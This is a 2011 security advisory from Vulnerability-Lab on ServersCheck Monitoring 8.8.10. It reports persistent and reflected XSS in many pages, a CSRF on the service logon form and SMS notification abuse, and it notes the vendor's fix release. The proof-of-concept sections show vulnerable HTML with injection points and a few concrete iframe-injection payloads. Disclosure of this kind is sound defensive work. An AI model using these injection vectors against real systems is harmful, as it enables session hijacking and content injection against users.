Document Title:
===============
ServersCheck Monitoring 8.8.10 - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=93

FULL:
Discl. Date	OSVDB ID	CVE ID	Creditees	Title
2011-09-27 	76035 		Benjamin Kunz Mejri
	ServersCheck Monitoring checks2def.html Multiple Parameter XSS
2011-09-27 	76036 		Benjamin Kunz Mejri
	ServersCheck Monitoring viewalerts.html fromdate Parameter XSS
2011-09-27 	76037 		Benjamin Kunz Mejri
	ServersCheck Monitoring downtime.html Multiple Parameter XSS
2011-09-27 	76038 		Benjamin Kunz Mejri
	ServersCheck Monitoring timeline/timeline.html xml Parameter XSS
2011-09-27 	76039 		Benjamin Kunz Mejri
	ServersCheck Monitoring devicegraphs.html device Parameter XSS
2011-09-27 	76040 		Benjamin Kunz Mejri
	ServersCheck Monitoring viewgraphs.html label Parameter XSS
2011-09-27 	76041 		Benjamin Kunz Mejri
	ServersCheck Monitoring timeline_generate.html xml Parameter XSS
2011-09-27 	76042 		Benjamin Kunz Mejri
	ServersCheck Monitoring devicescan1.html linenumber Parameter XSS
2011-09-27 	76043 		Benjamin Kunz Mejri
	ServersCheck Monitoring reporting2.html ItemList Parameter XSS
2011-09-27 	76044 		Benjamin Kunz Mejri
	ServersCheck Monitoring bandwidthreporting2.html reportname Parameter XSS
2011-09-27 	76045 		Benjamin Kunz Mejri
	ServersCheck Monitoring devicedetails.html device Parameter XSS
2011-09-27 	76046 		Benjamin Kunz Mejri
	ServersCheck Monitoring smstest1.html gsm Parameter XSS
2011-09-27 	76047 		Benjamin Kunz Mejri
	ServersCheck Monitoring teamsedit.html teamname Parameter XSS
2011-09-27 	76048 		Benjamin Kunz Mejri
	ServersCheck Monitoring usersedit.html username Parameter XSS
2011-09-27 	76049 		Benjamin Kunz Mejri
	ServersCheck Monitoring windowsaccountsedit.html Multiple Parameter XSS
2011-09-27 	76050 		Benjamin Kunz Mejri
	ServersCheck Monitoring msnsettings.html account Parameter XSS
2011-09-27 	76051 		Benjamin Kunz Mejri
	ServersCheck Monitoring enterprisesettings2.html Multiple Parameter XSS
2011-09-27 	76052 		Benjamin Kunz Mejri
	ServersCheck Monitoring checks3other.html namevisible Parameter XSS
2011-09-27 	76053 		Benjamin Kunz Mejri
	ServersCheck Monitoring smssettings.html body Parameter XSS
2011-09-27 	76054 		Benjamin Kunz Mejri
	ServersCheck Monitoring addwizard3.html required_filename Parameter XSS
2011-09-27 	76055 		Benjamin Kunz Mejri
	ServersCheck Monitoring bulkedit.html filterby Parameter XSS


Release Date:
=============
2011-09-26


Vulnerability Laboratory ID (VL-ID):
====================================
93


Common Vulnerability Scoring System:
====================================
4


Product & Service Introduction:
===============================
ServersCheck is a Belgian based and privately owned technology company founded in 2003.
It is most known in the Network Administrator community for its software program monitoring the availability and performance of 
servers and other networked devices. Next to this it also offers environmental sensors; providing monitoring from both the inside 
and the outside.

ServersCheck Monitoring ist, ein Werkzeug zum Überwachen, Melden und Warnen der Netzwerk- und Systemverfügbarkeit, 
das auf Windowsrechnern läuft. Zusätzlich zur Überwachung von normalen Netzwerkgeräten kann dieses Programm auch die 
Umgebung der Geräte auf Temperatur, Luftfeuchtigkeit, Überschwemmung, überwachen. ServersCheck Software läuft als 
lokaler Dienst und wird über ein Browserbasierendes Interface administriert. Zusätzliche Funktionen enthalten Warnmeldungen 
und stellen Statistiken von langlaufenden Aufzeichnungen grafisch dar.

(Copy of the Vendor Homepage: http://www.serverscheck.com/)


Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered multiple Vulnerabilities on ServersCheck Monitoring Software v8.8.10 & v8.8.6.


Vulnerability Disclosure Timeline:
==================================
2011-09-26:	Last Vendor Notification
2011-09-27:	Public or Non-Public Disclosure
2011-09-27:	Vendor Response/Feedback
2011-09-27:	Vendor Fix/Patch


Discovery Status:
=================
Published


Affected Product(s):
====================
ServersCheck
Product: Monitoring Software 8.8.10 & 8.8.6


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
1.1
Multiple persistent input validation vulnerabilities are detected on (application-side) of Serverscheck monitoring software.
The remote vulnerability allows local low privileged user accounts or remote attackers to manipulate specific sections, areas or 
content requests via Java or HTML script code injection.

Vulnerable Module(s):  (Persistent)
					[*] New Team / Team List
					[*] New User / User List
					[*] Windows Account Edits / Windowsbenutzer Berechtigungsnachweis 
					[*] Rules Size Add
					[*] MSN Accounts Rules & copied Functions
					[*] ServersCheck Protokolldateibetrachter: scan.txt 
					[*] SNMP Trapkonfiguration
					[*] Axis Camera - Add & Configuration
					[*] Neue Überwachungsregel / Observation Rules
					[*] User Diagram / Add
					[*] ODBC Protocol
					[*] SMS TEST SCRIPT

Picture(s):
					../2.png
					../3.png


1.2
Multiple non-persistent input validation vulnerabilities are detected on application-side of Serverscheck.
The vulnerability allows an attacker to hijack customer/admin sessions.
Successful exploitation requires high user inter action.

Vulnerable Module(s): 
					[*] Downtime
					[*] Linenumber
					[*] ID
					[*] Checks2def (Footer/Header)
					[*] Timeline
					[*] Definere Einstellungen zur Dienstanmeldung
					[*] Device Graphs
					[*] View Graphs
					[*] Rules History

Picture(s):
			../1.png


1.3
A cross site request forgery vulnerability is detected on the Dienstanmeldung formular. 
Attackers can force a logon via cross site request forgery attack.

Vulnerable Module(s): 
					[*] Einstellungen zur Dienstanmeldung

1.4
Attackers can create own masks to send mass notifcations on a vendor phone number without any restrictions by the application itself.

Vulnerable Module(s): 
					[*] SMS- & Pager (http://localhost:1272/smstest.html?  &2 :)


Proof of Concept (PoC):
=======================
The different vulnerabilities can be exploited by local low privileged user accounts, software users or remote attackers. 
For demonstration or reproduce ...


1.1

Code Review: 	Input Validation Vulnerabilities (Persistent)

http://localhost:1272/userslist.html?

<table border="0" cellpadding="0" cellspacing="0" class="tabdata" width='98%'>
<tr bgcolor="#ff9900">
<td width=90%><b>Benutzername</b></td>
<td align=center><b>Zugriffsrechte</b></td>
<td align=center><b>Löschen</b></td></tr>
<tr bgcolor='#ffef95'><td style='padding-left:3px;padding-right:3px;'><a href='/usersettingsedit.html?username=
>"<INSERT SCRIPTCODE HERE!>&'>>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!></a></td>
<td align=center><a href="/usersettingsedit.html?username=>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>">
<img src="/output/images/security.gif" border=0></a></td>
<td align=center><a href='' onclick="return deleteit('0');"><img src='/output/images/delete.gif?' border=0></a></td>
</tr><tr ><td style='padding-left:3px;padding-right:3px;'><a href='/usersettingsedit.html
?username=>"<iframe src=http://test.de>&'>>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!></a></td>
<td align=center><a href="/usersettingsedit.html?username=>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>">
<img src="/output/images/security.gif" border=0></a></td>
<td align=center><a href='' onclick="return deleteit('1');"><img src='/output/images/delete.gif?' border=0></a></td>
</tr></table><br><form action=usersadd.html method=post><td><input type=hidden name=add value=yes>
<input type=submit value="NEUEN BENUTZER HINZUFüGEN" ></form>


http://localhost:1272/downtime.html

<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style='padding-left:5px;padding-top:5px;'><font color=black style="font-size: 16px;"><strong>
Downtime Bericht >"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!> (1171011122)
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">
<br><div id="overDiv" style="position:absolute; visibility:hidden; z-index:1000;"></div>


http://localhost:1272/windowsaccountslist.html

<table border="0" cellpadding="0" cellspacing="0" class="tabdata">
<tr bgcolor="#ff9900">
<td><b>Benutzername</b></td>
<td align=center><b>Löschen</b></td>
</tr>
<tr bgcolor='#ffef95'><td style='padding-left:3px;padding-right:3px;'><a href='/windowsaccountsedit.html?id=
1269018355&'>>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!></a></td>
<td align=center><a href='' onclick="return deleteit('1269018355');"><img src='/output/images/delete.gif?' border=0></a></td>
</tr></table><br>
<form action=windowsaccountsedit.html method=post><td><input type=hidden name=add value=yes>
<input type=submit value="NEUEN BENUTZER HINZUFüGEN" ></form>


http://localhost:1272/msnsettings.html

<div id="overDiv" style="position:absolute; visibility:hidden; z-index:1000;"></div>
<script langauge="JavaScript" src="/output/js/overlib.js?"></script>
<div style='padding-left:5px;padding-top:5px;'><font color=black style="font-size: 16px;"><strong>
Konfiguriere MSN Warnung
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.Gradient
(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">
<br>Sie müssen ein MSN Konto festlegen, von dem das MSN basierten Warnungen geschickt werden.<br>
<script language="JavaScript">
 alert('Einstellungen gespeichert');
</script><div id='stylized' class='settingsform'>
<form method=post action=msnsettings.html name=msn>
<input type=hidden name=setting value='MSN'>
<label>MSN Konto Name</label><input type=text name=account size=30 value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>"><br>
<label>MSN Konto Passwort</label><input type=password name=password size=10 value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>"<br>
<br><br><input type=submit class='buttonok' value="EINSTELLUNGEN SPEICHERN" ></form></div>
<br><br></table><br><br> </td></tr></table>


http://localhost:1272/enterprisesettings2.html

<form method=post action=enterprisesettings2.html>
<input type=hidden name=setting value='SNMPTRAP'>
<input type=hidden name=stop value=''>
<label>IP, an die die Traps gesendet werden</label><input type=text name=newsetting0 size=30 value="127.0.0.1" >
 <a onmouseover="return overlib('Geben Sie eine IP Adresse oder einen Domänennamen ein, an welche die Traps gesendet
 werden', LEFT);" onmouseout="return nd();"><img src="/output/images/info.gif?" border=0 alt='Info'></a><br>
<label>Port</label><input type=text name=newsetting1 size=30 value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!><br>
<label>Der Community String.</label><input type=text name=newsetting2 size=30 value="" ><br>
<br><br><input type=hidden value="127.0.0.1<X>>"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!>" name=previoussetting><input type=hidden value="" 
name=check><input type=submit class='buttonok' value="EINSTELLUNGEN SPEICHERN" >  <input type=button 
value="SENDUNG VON SNMP TRAPS BEENDEN" class='buttonnok' Onclick="this.form.stop.value=1; this.form.submit();"></form></div>
<br><br></table><br><br> </td></tr></table>


http://localhost:1272/settings.html?setting=LOGGING&

<label>Datenbank Vorlagen</label><select name=odbctemplate onchange="javascript:changetemplate();">
<option value="">Wähle eine Datenbank Vorlage</option>
<option value="Driver={Oracle ODBC Driver};Dbq=myDBName;Uid=myUsername;Pwd=myPassword">Oracle ODBC Driver</option>
<option value="Driver={Microsoft ODBC for Oracle};Server=OracleServer.world;Uid=myUsername;Pwd=myPassword">Microsoft Oracle ODBC Driver</option>
<option value="Driver={INFORMIX 3.30 32 BIT};Host=hostname;Server=myserver;Service=service-name;Protocol=olsoctcp;Database=mydb;UID=username;PWD=myPwd 
">Informix 3.30 ODBC Driver</option>
<option value="Driver={Pervasive ODBC Client Interface};ServerName=srvname;dbq=">Pervasive ODBC Driver</option>
<option value="Driver={SQL Server}; Server=(local); Database=myDBName; UID=sa; PWD=;">MS SQL ODBC Driver</option>
<option value="Driver={SQL Server Native Client 10.0}; Server=enter_IP_here; Database=enter_db_name_here; UID=enter_account_name_here; 
PWD=enter_password_here;">MS SQL 2008</option>
<option value="Driver={Microsoft Access Driver (*.mdb)}; DBQ=C:myDBName.mdb">MS Access ODBC Driver</option>
<option value="Driver={Microsoft Excel Driver (*.xls)};DBQ=physical path to .xls file; DriverID=278;">MS Excel ODBC Driver</option>
<option value="Driver={Microsoft Text Driver (*.txt;*.csv)};DefaultDir=physical path to .txt file;">Text ODBC Driver</option>
<option value="DRIVER={MySQL ODBC 3.51 Driver};SERVER=;DATABASE=;USER=;Password=">mySQL ODBC 3.51</option>
</select><br><label>ODBC Verbindungsstring</label><input type=text name=newsetting0 size=50 value=">"<INSERT SCRIPTCODE HERE!>" ><br><br>
<label>Speichere Werte in der Datenbank</label><input type=checkbox name=newsetting1 value="true" > Ja<br><br><br>
<input type=hidden value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!><X><X><X><X>" name=previoussetting><input 
type=hidden value="ODBC" name=check>
<input type=submit value="EINSTELLUNGEN SPEICHERN" class='buttonok'>  
<input type=button class='buttonnok' value="DATABANKERFASSUNG BEENDEN" Onclick="this.form.stop.value=1; this.form.submit();"></form>
</div><br><br></table><br><br> </td></tr></table>

<label>ODBC Verbindungsstring</label><input type=text name=newsetting0 size=50 value=">"<iframe src=http://vulnerability-lab.com width=600 height=600>" 
><br><br><label>Speichere Werte in der Datenbank</label><input type=checkbox name=newsetting1 value="true" > Ja<br><br><br>
<input type=hidden value=">"<INSERT OWN PERSISTENT SCRIPTCODE HERE!!!><X><X><X><X>" name=previoussetting><input type=hidden value="ODBC" name=check>
<input type=submit value="EINSTELLUNGEN SPEICHERN" class='buttonok'>  
<input type=button class='buttonnok' value="DATABANKERFASSUNG BEENDEN" Onclick="this.form.stop.value=1; this.form.submit();"></form>
</div>



References:
http://localhost:1272/userslist.html?
http://localhost:1272/teamslist.html?
http://localhost:1272/windowsaccountsedit.html
http://localhost:1272/bulkedit.html?
http://localhost:1272/msnsettings.html
http://localhost:1272/enterprisesettings2.html
http://localhost:1272/settings.html?setting=LOGGING&





1.2
Code Review:  	Input Validation Vulnerabilities (Non Persistent)

http://localhost:1272/checks2def.html

<form action=checks3other.html method=post name=checksdef onSubmit='return checkrequired(this)'>
<input type=hidden name=linenumber value=">"<NON-PERSITENT SCRIPTCODE HERE!>"><input type=hidden name=type value="">
<input type=hidden name=addcheck value=""><input type=hidden name=editsettings value="1">
<input type=hidden name=uidrule value="1171011122">
<input type=hidden name=id value="1171011122">
<input type=hidden name=required_label value="1171011122">
<input type=hidden name=devicegraphs value=""><tr>
<td>Überwachungregel Bezeichnung</td><td><input type=text size=35 name=namevisible value="WINDOWSHEALTH" style='width:250px;'></td><td>
</td></tr><tr><td>Geräte-Name</td><td>


http://localhost:1272/check2alerts.html

<form method=post action=checks2alerts.html name=alerts target="main"><td>  <td><input type=hidden value="" 
name=linenumber><input type=hidden value="" name=check> <input type=button value='FEHLER MELDUNGEN'  alt="/checks2alerts.html?
linenumber=&check=&type=down&KeepThis=true&TB_iframe=true&height=400&width=850"  title='Bearbeite Alarme für den FEHLER 
– Status' class='thickbox buttonalertsdown'></td></form>
<form method=post action="" name=alerts target="main" ><td>  </td><td><input class='buttonnok' type=submit  value="
REGEL LöSCHEN" onclick="return deleteit('>"<NON-PERSITENT SCRIPTCODE HERE!','');" onmouseover="return overlib('Durch  klicken auf dieses Icon können 
Sie die Überwachungsregel löschen.  Diese Operation kann nicht rückgängig gemacht werden.', LEFT);" onmouseout="return nd();"></td></form>
</tr></table></div><br><br> 


http://localhost:1272/viewalerts.html

<div style='padding-left:5px;padding-top:5px;'><font color=black style="font-size: 16px;"><strong>
Regel Historie >"<NON-PERSITENT SCRIPTCODE HERE!> (<a href="/viewfile.html?file=\checkslogs\1171011122.log">1171011122</a>)
</strong></font><hr align="left" width="97%" size="1" color="#ff9900" noshade style="padding-top:0px; filter:
progid:DXImageTransform.Microsoft.Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">
<br>


http://localhost:1272/downtime.html

<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style='padding-left:5px;padding-top:5px;'><font color=black style="font-size: 16px;"><strong>
Downtime Bericht >"<NON-PERSITENT SCRIPTCODE HERE!> (1171011122)
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')">
<br><div id="overDiv" style="position:absolute; visibility:hidden; z-index:1000;"></div>


Non Persistent References:
http://localhost:1272/checks2def.html?id=
http://localhost:1272/checks2def.html?id=1171011122&linenumber=6&check=
http://localhost:1272/checks2def.html?id=1171011122&linenumber=
http://localhost:1272/downtime.html?label=
http://localhost:1272/downtime.html?label=1171011122&keyz=1171011122WINDOWSHEALTH&labelvisible=
http://localhost:1272/timeline/timeline.html?xml=
http://localhost:1272/devicegraphs.html?device=
http://localhost:1272/viewgraphs.html?label=
http://localhost:1272/viewalerts.html?label=1171011122&labelvisible=



1.3
Code Review:  	Cross Site Request Forgery (Force|Non Persistent)

<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style="padding-left:5px;padding-right:5px;padding-top:10px;padding-bottom:10px;width:90%">
<img src="/output/images/generalsettings.jpg" border="0" align="left">
<div style='padding-left:5px;padding-top:5px;'><font color=black style="font-size: 16px;"><strong>
Definere Einstellungen zur Dienstanmeldung.
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.Gradient
(startColorStr='#ffcc00', endColorStr='white', gradientType='1')"> <br>
ServersCheck läuft als ein Dienst auf diesem Computer. Standardmäßig laufen alle Dienste von Windows unter dem lokalen Systemkonto.  
Ein Dienst hat Zugang auf die Maschine, wo er gerade läuft, aber es ist ihm ein Remotezugriff  andere Computer untersagt. Für Windows 
basierende Checks (Plattenspeicherplatz, Speicher, CPU...), muss der ServersCheck Monitoring-Dienst unter einem Windows Admin-Konto laufen.<br><br>
Setze hier die Domäne oder den System-Admin Benutzernamen mit Passwort.  Zum Auslassen dieser Option bitte leer lassen.<br><br>
<form action=popup_service2.html method=post name=service setting><table cellpadding=5><tr><td>
Administrator Benutzername</td><td align=right>
<input type=text size=20 name=user></td></tr><tr><td>
Administrator Passwort</td><td align=right>
<input type=password size=20 name=pass></td></tr></table>
<br><br><input type=submit class='buttonok' value=">> AKTUALISIERUNG" >  <input type=button class='buttonnok' 
value="SKIP" Onclick="window.location='/popup1.html';">
</form></div></div><br><br>




http://localhost:1272/viewlogfile2.html?file=scan.txt&

<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style='padding-left:5px;padding-top:5px;'><font color=black style="font-size: 16px;"><strong>
ServersCheck Protokolldateibetrachter: scan.txt
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade style="padding-top:0px; 
filter:progid:DXImageTransform.Microsoft.Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')"><br>
<a href="/emptyfile.html?file=logging\scan.txt&">Leere Datei</a>
  <a href="/emptyfile.html?file=logging\scan.txt&delete=true&">Löschen Protokolldatei</a>
<hr noshade width=100%><ul><font color=black>
# Fri Mar 19 17:37:52 2010 Scanning ><iframe src=http://vulnerability-lab.com width=600 height=600>..:  Ping Failed
<br></font></ul></div><br><br> </BODY></HTML>


or ...


<HTML>
<HEAD>
<TITLE>ServersCheck 21 Day Evaluation Edition  - version 8.0.8</TITLE>
<META http-equiv=content-type content="text/html">
<LINK HREF="/output/css/serverscheck.css" rel="stylesheet" type="text/css"> 
<LINK HREF="/output/css/thickbox.css" rel="stylesheet" type="text/css" media="screen" />
<script type="text/javascript" src="/output/js/jquery.js"></script>
<script type="text/javascript" src="/output/js/thickbox.js"></script>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD><!-- DE -->
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style='padding-left:5px;padding-top:5px;'><font color=black style="font-size: 16px;"><strong>
ServersCheck Protokolldateien</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
Gradient(startColorStr='#ffcc00', endColorStr='white', gradientType='1')"><br>
Um die Protokolldatei anzusehen, klicken Sie auf den Hyperlink, um sie zu öffnen.<br><ul>
<li><a href="/viewlogfile2.html?file=graphs-errors.log&">graphs-errors.log</a></li>
<li><a href="/viewlogfile2.html?file=monitoring_manager_2010-3-19.log&">monitoring_manager_2010-3-19.log</a></li>
<li><a href="/viewlogfile2.html?file=statuschange_2010-3-19.log&">statuschange_2010-3-19.log</a></li>
<li><a href="/viewlogfile2.html?file=watcher.log&">watcher.log</a></li>
</ul></div><br><br> </BODY></HTML>


Solution - Fix & Patch:
=======================
Vendor reacted promptly by addressing issue in a fix release that has been made available within hours following public disclosure 
of the report – this release 8.8.11 is available for download 2011-09-27


Security Risk:
==============
1.1 - The security risk of  the persistent vulnerabilities are estimated as medium(+).
1.2 - The security risk of the non-persistent vulnerabilities are estimated as low(+).
1.3 - The security risk of the cross site request forgery attack is estimated as low(+).


Credits & Authors:
==================
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory